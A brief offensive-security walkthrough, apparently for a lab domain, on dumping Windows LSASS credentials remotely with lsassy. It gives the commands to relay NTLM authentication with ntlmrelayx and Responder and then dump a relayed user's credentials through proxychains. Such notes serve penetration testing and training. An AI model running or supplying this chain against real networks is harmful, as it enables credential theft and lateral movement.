Lsassy
Use lsassy to get the lsass process stored credentials
Domain accounts informations are stored in the LSASS process so make a dump of this process can give you more domain accounts and privileges.
Lsassy allow you to dump lsass remotely (very more convenient then doing a procdump, download of the lsass dump file and doing pypykatz or mimikatz locally), it do all the painful actions like dump and read lsass content for you (it also dump only the usefull part of the lsass dump optimizing the time of transfer). (lsassy also exist as a cme module)
Install LSASSY
python3 -m pip install lsassy
Run ntlmrelayx.py and wait for a connecting for fernando.alonzo
sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt

Run Responder
sudo responder -I enp0s3
Run LSASSY
proxychains lsassy --no-pass -d NORTH -u fernando.alonzo 192.168.56.22
Last updated